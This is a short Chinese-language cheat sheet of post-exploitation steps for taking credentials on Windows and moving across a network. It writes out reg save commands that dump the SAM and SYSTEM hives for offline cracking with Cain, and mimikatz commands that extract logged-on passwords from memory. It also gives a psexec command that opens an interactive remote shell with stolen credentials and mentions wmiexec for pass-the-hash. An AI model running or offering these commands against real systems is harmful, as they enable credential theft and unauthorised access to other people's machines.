获取用户密码

使用SAMInside获取用户密码

reg save hklm\sam C:/sam.hive
reg save hklm\system C:/system.hive

用cain解密

或者复制sam到自己本机上然后再用

 

 

 mimikatz获取登陆过的账号密码

mimikatz

log

privilege::debug

sekurlsa::logonpasswords

 

在开启smb的情况下，却没有3389

在获取主机账号和密码的时候

PsExec.exe 可以获取一个交互式的shell

psexec \\hostIp -u [username] -p [password] cmd

 

在没有密码只有hash的时候

wmiexec.exe 可以执行命令，一次执行一条命令